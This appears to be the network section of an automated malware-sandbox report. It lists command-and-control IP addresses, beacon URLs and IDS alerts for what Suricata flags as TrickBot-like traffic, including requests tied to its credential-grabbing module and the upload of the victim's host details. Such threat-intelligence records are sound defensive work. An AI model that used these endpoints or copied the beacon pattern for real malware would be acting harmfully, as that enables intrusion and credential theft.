NetWork | ZeroBOX

Network Analysis

IP Address       Status   Action
103.26.251.214   Active   Moloch
12.158.156.51    Active   Moloch
137.27.167.58    Active   Moloch
164.124.101.2    Active   Moloch
172.217.25.14    Active   Moloch
24.182.101.64    Active   Moloch
45.164.80.94     Active   Moloch
67.212.241.127   Active   Moloch
67.79.117.70     Active   Moloch
72.180.57.176    Active   Moloch
75.87.15.158     Active   Moloch
95.217.228.176   Active   Moloch
98.6.170.206     Active   Moloch
HTTP requests

Method  Status  URL
GET     200     https://72.180.57.176/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
GET     200     https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
GET     200     https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/jdtzrTn7D1fhJNbBNVH7NJBPBDzrN/
GET     200     https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
GET     200     https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
GET     200     https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CNetDownloadMng5575191179%5Cxzcountlb.dwn/0/
GET     200     https://75.87.15.158/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/1jdJTPhNJftt9llb5HDzBt1d1t3/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/NAT%20status/client%20is%20behind%20NAT/0/
GET     403     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/QHAVHUMUVKIZYSUYVK/7/
GET     404     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/23/2000027/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/DNSBL/listed/0/
GET     200     https://67.79.117.70/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/pxPtLlVV7rz3hFHPxXVH9ntpH3/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/5/kps/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/0/Windows%207%20x64%20SP1/1105/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/JXX9LFPNtFT75Htn3nVXhlnxNLP/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/user/test22/0/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/1/4j4pxaBWesD3gH7yYCXrlLdHM/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/10/62/707854/0/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab/sTart%20Run%20D%20failed/0/
GET     200     https://137.27.167.58/rob39/TEST22-PC_W617601.312A97F76E51F9D43B18A1FFD13B7EF0/14/pwgrab64/reload1/0/
GET     200     http://wtfismyip.com/text


ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49814 -> 72.180.57.176:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 72.180.57.176:443 -> 192.168.56.102:49814 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49823 -> 45.164.80.94:447 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 45.164.80.94:447 -> 192.168.56.102:49823 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49815 -> 75.87.15.158:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 75.87.15.158:443 -> 192.168.56.102:49815 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49821 -> 67.79.117.70:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 67.79.117.70:443 -> 192.168.56.102:49821 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49818 -> 98.6.170.206:447 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 98.6.170.206:447 -> 192.168.56.102:49818 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49826 -> 137.27.167.58:443 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 137.27.167.58:443 -> 192.168.56.102:49826 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49830 -> 24.182.101.64:449 2028401 ET JA3 Hash - Possible Malware - Various Trickbot/Kovter/Dridex Unknown Traffic
TCP 24.182.101.64:449 -> 192.168.56.102:49830 2011540 ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O) Not Suspicious Traffic
TCP 192.168.56.102:49816 -> 95.217.228.176:80 2019737 ET POLICY IP Check wtfismyip.com Potential Corporate Privacy Violation
TCP 192.168.56.102:49816 -> 95.217.228.176:80 2013028 ET POLICY curl User-Agent Outbound Attempted Information Leak

Suricata TLS

Flow                                                Issuer                                              Subject                                             Fingerprint
TLSv1 192.168.56.102:49814 -> 72.180.57.176:443     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     a1:ea:a4:fa:0a:5e:ba:b9:c1:46:42:a3:0b:3e:a6:e7:b4:e2:f7:f0
TLSv1 192.168.56.102:49823 -> 45.164.80.94:447      C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd  C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd  f1:ae:ef:9b:5f:b8:da:ca:2f:e8:b4:99:1d:16:71:ca:08:11:be:e4
TLSv1 192.168.56.102:49815 -> 75.87.15.158:443      C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79
TLSv1 192.168.56.102:49821 -> 67.79.117.70:443      C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79
TLSv1 192.168.56.102:49818 -> 98.6.170.206:447      C=US, ST=Some-State, O=Internet Widgits Pty Ltd     C=US, ST=Some-State, O=Internet Widgits Pty Ltd     8d:b6:86:81:b0:6b:e5:0a:58:13:73:ec:a7:95:6f:f6:4b:e2:e9:d8
TLSv1 192.168.56.102:49826 -> 137.27.167.58:443     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79
TLSv1 192.168.56.102:49830 -> 24.182.101.64:449     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     C=AU, ST=Some-State, O=Internet Widgits Pty Ltd     81:c4:f0:b6:a7:40:f0:09:2b:ab:2a:1c:df:80:a0:30:da:d8:93:79

Snort Alerts

No Snort Alerts